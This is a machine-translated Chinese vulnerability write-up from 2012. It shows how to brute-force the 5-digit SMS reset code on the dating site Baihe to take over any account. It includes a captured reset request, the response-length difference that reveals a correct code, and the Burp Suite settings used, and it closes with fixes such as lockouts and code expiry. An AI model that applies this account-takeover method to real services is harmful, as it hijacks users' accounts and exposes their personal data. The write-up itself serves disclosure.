Modifying the password of any sister account on Lily net and fixing the Vulnerability

Are you still scanning for the girls? Are you still hitting the database? Are you still worried about bypassing the image verification code? Singles' Day is approaching. I am about to send a password reset vulnerability to all major website accounts! 1. It is the main site of Lily. Enter the Account Logon page of Lily. Of course, we do not log on here, But click [forgot password ?] Button to enter the password reset process:

2. enter the account to be reset. Because only the test vulnerability exists, only my own account is used here: 3. click "Next" and select "register mobile phone retrieval" as the password retrieval method. Of course, you can also choose "AUTHENTICATE mobile phone retrieval" if the authentication is completed: 4. I have sent a text message code for resetting the password to my mobile phone number (to be different from the image verification code, this is the text message code) 5. check that the SMS Code received by the mobile phone is [58474]. First, I enter any 5-digit pure-number SMS code 12345. Click Submit and the following error is returned. Remember to set the browser proxy at this time: 6. at the same time, the packet capture request is: GET/ForgotPwdByMobileServlet? Jsoncallback = jsonp1352425895960 & checkflag = 1 & reqtype = 2 & code = 12345 & _ = 1352426000488 & mobilenum = 1 ********* 9 HTTP/1.1 Host: passport. he. comProxy-Connection: keep-aliveX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) chrome/24.0.1284.2 Safari/537.13 Accept: text/javascript, application/javascript, */* Referer: http://passport.baihe.com/forgotPwdByRegMobile.htmlAccept-Encoding : Gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3 Cookie: tempID = 8171464184; _ utma = bytes; _ utmb = 175516593.1.10.1352424945; _ utmc = 175516593; _ utmz = bytes = (direct) | utmccn = (direct) | utmcmd = (none ); JSESSIONID = C22281DF4A91C1DE89890018C79716DA; findpwd_val = 1 ********** 9; Hm_lvt_5caa30e0c191a1c 525d4a6108bf45a9d = 1352424944737; token = 1352425904077 the above parameter code = 12345 is the SMS code, and the parameter mobilenum = 1 ********* 9 is the mobile phone number. 7. after writing so much, let's get started: Set the parameter code as the parameter to be cracked. Here, because it is a test, I started to guess brute force 8 from 59400. get the correct SMS code by the number of bytes returned or the returned content: When the SMS code is incorrect, the number of bytes returned is 436, and when the SMS code is correct, the number of bytes is 634, which is determined from the content, the returned content is HTTP/1.1 200 OKDate: Fri, 09 Nov 2012 01:57:47 GMTServer: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag = JBoss_4_0_3_SP1 date = 200510231054)/Tomcat-5.5Connection: closeContent-Length: 65Cache-Control: max-age = 86400 Expi Res: Sat, 10 Nov 2012 01:57:47 GMTContent-Type: text/json; charset = gbk jsonp1352425895961 ({"mobilenum": "1 ********** 9 ", "checkresult": "0"}) when the SMS code is correct, the returned content is: HTTP/1.1 200 OKDate: Fri, 09 Nov 2012 01:57:59 GMTServer: baihe_passport_60/2.0.63 (Unix) mod_jk/1.2.30X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag = jboss_4_0_3_sp_3pp60java2 date = 200510231054)/Tomcat-5.5Connection: closeContent-Length: 262Ca Che-Control: max-age = 86400 Expires: Sat, 10 Nov 2012 01:57:59 GMTContent-Type: text/json; charset = gbk jsonp1352425895961 ({"mobilenum ": "1 ********** 9", "checkresult": "75526369", "mobilenum_encode": "eeb0550021599cdd98d3cfc9c0000665d", "ed": "Limit "}) 9. use the cracked text message code to reset the account! 10. yundun Attack:

Solution:1. There is also a very serious bug, one time to retrieve the account for long-term availability, my reset link is as follows (how to get it ?), However, the risk of my account being maliciously reset and leaked personal information is evaluated, and the last eight digits are hidden: www.2cto. comhttp: // passport.baihe.com/resetPwd.jsp? As long as the above link is used, you do not need to reset the password to re-update the password. The brute-force cracking of 2.5-bit plain text message Codes, that is, an average of 50 thousand requests. I used burpsuite to test a single machine's 100 threads and reset any mobile phone account in four minutes! Dangerous 3. The text message code can be 5 pure numbers or even 4 pure numbers. You can not set the image verification code or even set the validity period of the text message code. But why don't I lock the password reset request if I fail to set the password for five consecutive attempts?